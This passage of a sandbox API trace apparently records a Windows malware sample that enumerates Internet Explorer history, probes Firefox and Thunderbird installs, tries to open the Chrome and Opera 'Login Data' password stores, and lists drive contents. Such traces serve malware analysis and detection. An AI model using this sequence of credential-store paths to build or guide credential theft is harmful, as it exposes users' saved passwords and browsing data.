pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.347] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.348] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.348] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.348] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.349] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.349] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.349] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.349] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.349] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.350] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.350] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.350] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.350] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.350] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.351] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.351] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.351] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.351] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.351] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.352] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.352] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.352] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.352] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.352] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.353] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.353] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.353] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.353] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.353] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.353] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.354] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.354] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.354] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.354] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.354] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.355] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.355] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.355] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.355] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.355] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.356] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.356] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.356] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.357] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.357] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.357] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x0) returned 0x1 [0174.357] IUnknown:Release (This=0x77a078) returned 0x0 [0174.357] IUnknown:Release (This=0x779e30) returned 0x1 [0174.358] CoUninitialize () [0174.396] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14d760, Length=0x800, ResultLength=0x14e618 | out: KeyValueInformation=0x14d760, ResultLength=0x14e618) returned 0x8000001a [0174.396] NtClose (Handle=0xf8) returned 0x0 [0174.420] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x4540020) returned 1 [0174.467] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7374) returned 0x7b0f20 [0174.472] NtCreateKey (in: KeyHandle=0x14e57c, DesiredAccess=0x20219, ObjectAttributes=0x14e3f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Firefox\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e57c*=0x0) returned 0xc0000022 [0174.473] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x14e12c | out: Value="C:\\Program Files (x86)") returned 0x0 [0174.473] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtPathName=0x14e100, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.493] NtCreateFile (in: FileHandle=0x14e120, DesiredAccess=0x120089, ObjectAttributes=0x14e0e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e108, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e120*=0x0, IoStatusBlock=0x14e108*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0174.493] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0174.493] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0x14e100, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.493] NtCreateFile (in: FileHandle=0x14e120, DesiredAccess=0x120089, ObjectAttributes=0x14e0e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e108, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e120*=0x0, IoStatusBlock=0x14e108*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0174.494] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0174.494] NtCreateKey (in: KeyHandle=0x14e574, DesiredAccess=0x20219, ObjectAttributes=0x14e3ec*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Thunderbird\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e574*=0x0) returned 0xc0000022 [0174.494] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x14e124 | out: Value="C:\\Program Files (x86)") returned 0x0 [0174.494] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtPathName=0x14e0f8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.494] NtCreateFile (in: FileHandle=0x14e118, DesiredAccess=0x120089, ObjectAttributes=0x14e0e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e100, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e118*=0x0, IoStatusBlock=0x14e100*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0174.494] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0174.494] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0x14e0f8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.494] NtCreateFile (in: FileHandle=0x14e118, DesiredAccess=0x120089, ObjectAttributes=0x14e0e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e100, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e118*=0x0, IoStatusBlock=0x14e100*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0174.495] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0174.495] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7b0f20) returned 1 [0174.496] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="LOCALAPPDATA", Value=0x14e1dc | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0174.496] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtPathName=0x14e1b0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.496] NtCreateFile (in: FileHandle=0x14e1d0, DesiredAccess=0x120089, ObjectAttributes=0x14e198*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e1b8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e1d0*=0x0, IoStatusBlock=0x14e1b8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0174.496] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0174.496] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x14e12c | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0174.496] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtPathName=0x14e110, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.496] NtCreateFile (in: FileHandle=0x14e130, DesiredAccess=0x120089, ObjectAttributes=0x14e0f8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e118, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e130*=0x0, IoStatusBlock=0x14e118*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0174.497] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0174.498] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x14d7fc | out: Value="C:\\Program Files (x86)") returned 0x0 [0174.509] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7f4e9560, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f4e9560, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x77c9f0 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x95957a00, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95957a00, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95957a00, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa384ad20, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa384ad20, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xd7721b60, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa37fea60, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa37fea60, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xd7bbe600, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1373d4f0, ftLastAccessTime.dwHighDateTime=0x1d7b066, ftLastWriteTime.dwLowDateTime=0x1373d4f0, ftLastWriteTime.dwHighDateTime=0x1d7b066, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe8a7c4d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8a7c4d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7844bbf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x78471d50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x78471d50, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xa3740380, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x4f8caa80, ftLastAccessTime.dwHighDateTime=0x1d7a944, ftLastWriteTime.dwLowDateTime=0x4f8caa80, ftLastWriteTime.dwHighDateTime=0x1d7a944, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x571be860, ftLastAccessTime.dwHighDateTime=0x1d7a944, ftLastWriteTime.dwLowDateTime=0x571be860, ftLastWriteTime.dwHighDateTime=0x1d7a944, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0174.510] FindNextFileW (in: hFindFile=0x77c9f0, lpFindFileData=0x14d474 | out: lpFindFileData=0x14d474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x571be860, ftLastAccessTime.dwHighDateTime=0x1d7a944, ftLastWriteTime.dwLowDateTime=0x571be860, ftLastWriteTime.dwHighDateTime=0x1d7a944, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0174.510] FindClose (in: hFindFile=0x77c9f0 | out: hFindFile=0x77c9f0) returned 1 [0174.520] FindFirstFileW (in: lpFileName="D:\\*", lpFindFileData=0x14d4a4 | out: lpFindFileData=0x14d4a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, 